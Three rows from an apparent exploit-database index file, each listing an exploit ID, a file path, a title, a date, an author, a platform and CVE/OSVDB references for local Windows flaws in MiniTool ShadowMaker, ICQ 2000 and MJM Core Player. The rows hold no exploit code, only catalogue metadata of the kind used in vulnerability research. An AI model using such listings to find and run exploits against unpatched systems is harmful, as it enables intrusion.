 49336,exploits/windows/local/49336.txt,"MiniTool ShadowMaker 3.2 - 'MTAgentService' Unquoted Service Path",2021-01-04,"Thalia Nieto",local,windows,,2021-01-04,2021-01-04,0,,,,,,
 19993,exploits/windows/local/19993.txt,"Mirabilis ICQ 2000.0 A - Mailclient Temporary Link",2000-06-06,"Gert Fokkema",local,windows,,2000-06-06,2012-07-21,1,CVE-2000-0552;OSVDB-1376,,,,,https://www.securityfocus.com/bid/1307/info
 17230,exploits/windows/local/17230.rb,"MJM Core Player 2011 - '.s3m' Local Stack Buffer Overflow (Metasploit)",2011-04-30,Metasploit,local,windows,,2011-04-30,2011-04-30,1,OSVDB-72101,"Metasploit Framework (MSF)",,,,http://www.corelan.be/advisories.php?id=CORELAN-11-004